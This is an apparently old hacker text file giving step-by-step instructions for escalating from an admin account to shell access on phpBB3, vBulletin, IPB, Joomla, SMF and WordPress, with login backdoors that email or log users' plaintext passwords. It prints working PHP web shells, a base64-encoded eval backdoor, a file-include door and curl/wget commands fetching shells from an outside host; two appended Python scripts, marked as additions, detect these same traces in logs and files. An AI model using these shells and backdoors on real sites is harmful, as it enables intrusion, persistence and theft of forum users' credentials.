backdoored
nTha

Contents:
1. phpBB3
2. vBulletin
3. IPB
4. Joomla
5. SMF
6. Wordpress
7. QuickRef

This txt is about escalating access when you have an admin
account on a CMS or forum, and also backdooring the login
protocol. Enjoy sluts - will add more when I see em.
Note: This is a combined list; some are my writings
and some are just grabbed from the nets.
phpBB3

The newest version of the most popular free forum is phpBB3.
I would even venture to say phpBB is the most used forum on
the net today. Anywho here we go.
Escalation:
Step 1. Admin Panel > Security Settings > Allow php.... ON
Step 2. Styles > Templates > Edit > faq_blah.html
Step 3. Enter the following code.
<!-- PHP -->$cmd = $_GET['cmd'];
system("$cmd", $return);
?><!-- ENDPHP -->
Step 4. Call faq.php
Example: http://www.zomgownme.com/phpBB3/faq.php?cmd=ls
Login Backdoor:
Step 1. Open file includes/functions.php
Step 2. FIND
$result = $auth->login($username, $password, $autologin, $viewonline, $admin);
Step 3. Add this after it:
$sitename = "domain.tld";
$recipient = 'youremail@gmail.com';
$subject = 'Password Alert - sitename';
$message = "Sitename: $sitename - Username: $username - Password: $password";
mail($recipient, $subject, $message);
vBulletin

vBulletin is the most popular paid forum. It is constantly
upgraded and has the best support because of that.
Escalation:
Step 1. On the sidebar select Plugins & Products
Step 2. Select Add New Plugin
Step 3. Complete the form like below
Product: vBulletin
Hook Location: Ajax_Complete
Title: Whatever
Execution Order: 5
Code: if(isset($_GET['cmd'])){echo "<h1>lol</h1><pre>"; system($_GET['cmd']);exit;}
Check Plugin Is ACTIVE
click Save
Step 4. Now go to domain.com/path/ajax.php?cmd=ls
Login Backdoor:
For versions 3.6.5-3.6.10, 3.7.0, 3.7.3 PL1 and 3.8.x
Step 1. Open global.php - it's in the main directory
Step 2. Search for the string below
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Step 3. Null the line out by adding // in front of the line
Step 4. Open login.php - it's in the main directory
Step 5. Search for process_new_login and add the following code under it
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
        $fp1 = @fopen($lg_file, "a+");
        @fwrite($fp1, $lg_username . ' : ' . $lg_password." (" . $row["email"] . ")\n");
        @fclose($fp1);
        $f = @file($lg_file);
        $new = array_unique($f);
        $fp = @fopen($lg_file, "w");
        foreach($new as $values)
        {
            @fputs($fp, $values);
        }
        @fclose($fp);
    }
}
Step 6. Check the log file at domain.com/path/includes/lg.html to make sure
it's actually logging. If it is not, create the file and give it the proper
permissions.
IPB

Invision Power Board is another popular forum. If it's popular you gotta know
how to own it.
Escalation:
Step 1. Go to Admin > Look and Feel > Manage languages
Step 2. Then choose public_help
Step 3. Edit help_txt, which originally is "Choose a topic from the list or search..."
Step 4. Add php code like below
${${phpinfo()}}
${${system("wget http://domain.com/shell.txt")}}
Step 5. Save changes
Step 6. Then go to the help module, which is located at
http://domain.com/ipb/index.php?app=core&module=help
No logging here; haven't had to yet.
Joomla

Joomla is a free CMS and is widely used.
Escalation Method 1:
Step 1. Select Extensions at the top and go to Template Manager
Step 2. Select the template and go to edit HTML
Step 3. Add php code to get a shell on the site
system("curl -o shell.php http://www.domain.com/shell.txt");
$cmd = $_GET['cmd'];
system("$cmd", $return);
Escalation Method 2:
Step 1. Go to Configuration
Step 2. Go to System
Step 3. Allow .php in extensions
Step 4. Go to the media manager
Step 5. Then upload your shell
SMF

Simple Machines Forum is another freebie for kids on the interwebs.
Escalation for SMF 1.1.4 Method 1:
Step 1. Enable Attachments
Step 2. Disable the encrypt filenames function
Step 3. Enable the php extension
Step 4. Upload an attachment (shell.php) in a new topic window.
Escalation for SMF 1.1.4 Method 2:
You can edit the template and add php code to it.
Wordpress

The most common blogger software.
Escalation Method 1:
Step 1. Login as Admin and click on Media on the sidebar
Step 2. Click Add New under Library
Step 3. Click Select Files and upload your shell
Step 4. Once uploaded, a prompt will come up and give you
the path to the shell
Escalation Method 2:
Step 1. Login as admin and click on Appearance on the sidebar
Step 2. Click Editor
Step 3. Click Comments (comments.php) on the right side
Step 4. Insert your php code
Step 5. Call comments.php in the wordpress template
www.domain.com/wp-content/themes/atahualpa.3.2/atahualpa/comments.php
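From the web server's side, the doors above all look alike: faq.php?cmd=, ajax.php?cmd= and a browser hitting a theme's comments.php directly. Added example, not part of the original paste: a small Python parser for Apache combined-format access logs that flags requests carrying the `cmd` or `file` parameter or requesting a theme template file directly. The log lines are constructed samples, and treating those parameter names and direct template requests as never-legitimate is an assumption about the stock forums.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache combined log format: ip ident user [time] "method url proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
# Query parameters the doors on this page read; assumed never used by the stock forums.
SHELL_PARAMS = {"cmd", "file"}
# Theme templates are included by WordPress, never requested directly by a browser (assumption).
DIRECT_TEMPLATE_RE = re.compile(r"/wp-content/themes/.+/comments\.php$")

# Constructed sample log lines, not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:10:01:02 +0000] "GET /phpBB3/faq.php?cmd=ls HTTP/1.1" 200 512 "-" "curl/7.19"
10.0.0.5 - - [12/Mar/2009:10:01:09 +0000] "GET /forum/ajax.php?cmd=id HTTP/1.1" 200 88 "-" "curl/7.19"
10.0.0.7 - - [12/Mar/2009:10:02:30 +0000] "GET /phpBB3/faq.php HTTP/1.1" 200 7040 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2009:10:03:11 +0000] "GET /wp-content/themes/atahualpa/comments.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2009:10:03:15 +0000] "GET /index.php?file=../../etc/passwd HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

def classify(line):
    """Return a finding dict for a suspicious request, or None for a normal or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    params = parse_qs(url.query, keep_blank_values=True)
    reasons = []
    hit = SHELL_PARAMS & set(params)
    if hit:
        reasons.append("shell parameter " + ",".join(sorted(hit)))
    if DIRECT_TEMPLATE_RE.search(url.path):
        reasons.append("direct request to theme template")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "path": url.path, "status": int(m.group("status")), "reasons": reasons}

def scan(log_text):
    """Run classify() over every line and keep the hits, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["path"], f["status"], "; ".join(f["reasons"]))
```

Feed it a real access log with `scan(open(path).read())`; a 200 response on a flagged request is the line worth pulling the file for.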
QuickReferences

This is a little area I added since I know I will be referring to this document
frequently. These are just simple things I use a lot and instead of searching
for txt files on my pc I can just quickly view it here.
1. Python SimpleHTTPServer, good for quickly dling dbs without having to cp or mv them
python -m SimpleHTTPServer 39282 (thanks w)
2. Simple phpdoor I use frequently.
$cmd = $_GET['cmd'];
system("$cmd", $return);
or
eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOyBpZigkX0dFVFsnY21kJ10peyBzeXN0ZW0oJF9HRVRbJ2NtZCddLCAkcmV0dXJuKTsgfQ=='));
or
if($_GET['file']){
    include($_GET['file']);
}
3. Find writeable areas
find . -perm -2 -ls
4. Tar up a directory
tar -cvzf name folder
5. i <3 curl
curl -o shell.php http://www.domain.com/shell.txt
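Every method in this document leaves a trace on disk: a PHP block in a phpBB template, a $_GET-driven system() or include(), an eval(base64_decode()) one-liner, the password capture in functions.php or login.php, or a .php file sitting in an attachment or media upload directory. Added example, not part of the original paste: a Python scanner that walks a web root for exactly those traces. The sample tree is constructed, and the directory names treated as upload areas are assumptions.

```python
import os
import re

# (regex, label) pairs for the backdoor forms shown in this document.
CONTENT_RULES = [
    (re.compile(r"<!--\s*PHP\s*-->"), "phpBB PHP block in template"),
    (re.compile(r"system\s*\(\s*\$_(?:GET|POST|REQUEST)\[|(\$\w+)\s*=\s*\$_(?:GET|POST|REQUEST)\[[^\]]*\]\s*;\s*system\s*\(\s*\"?\1\b"),
     "command shell via request parameter"),
    (re.compile(r"eval\s*\(\s*base64_decode\s*\("), "encoded eval backdoor"),
    (re.compile(r"include\s*\(\s*\$_(?:GET|POST|REQUEST)\["), "file-include door"),
    (re.compile(r"Password:\s*\$password|\$lg_password"), "plaintext login credentials captured"),
]
UPLOAD_DIRS = {"attachments", "uploads", "images", "media"}   # assumed data-only directories
PHP_EXT = (".php", ".phtml", ".php5")

# Constructed sample web root (path -> content); not taken from any real site.
SAMPLE_TREE = {
    "phpBB3/styles/prosilver/template/faq_body.html":
        "<h2>FAQ</h2>\n<!-- PHP -->$cmd = $_GET['cmd'];\nsystem(\"$cmd\", $return);<!-- ENDPHP -->\n",
    "phpBB3/includes/functions.php":
        "$result = $auth->login($username, $password, $autologin, $viewonline, $admin);\n"
        "$message = \"Sitename: $sitename - Username: $username - Password: $password\";\n",
    "forum/login.php": "$lg_password = $vbulletin->GPC[\"vb_login_password\"];\n",
    "wp-content/uploads/2009/03/shell.php": "<?php eval(base64_decode('AAAA')); ?>\n",
    "wp-content/themes/atahualpa/comments.php": "<?php include($_GET['file']); ?>\n",
    "phpBB3/faq.php": "<?php // untouched phpBB file, nothing to flag\n",
}

def scan_content(path, text):
    """Return the indicator labels that fire for one file, content rules first, then the path rule."""
    labels = [label for rx, label in CONTENT_RULES if rx.search(text)]
    parts = path.replace("\\", "/").lower().split("/")
    if any(p in UPLOAD_DIRS for p in parts[:-1]) and parts[-1].endswith(PHP_EXT):
        labels.append("PHP file in upload directory")
    return labels

def scan_tree(files):
    # files: {relative path: content}; returns {path: labels} for flagged files only
    return {p: l for p, l in ((p, scan_content(p, t)) for p, t in files.items()) if l}

def load_tree(root):
    # Read a real web root into the {path: content} shape scan_tree() expects.
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                files[os.path.relpath(full, root)] = fh.read()
    return files
```

Run `scan_tree(load_tree("/var/www"))` against a copy of the site; comparing the flagged files against a clean install of the same version separates an injected line from a false positive.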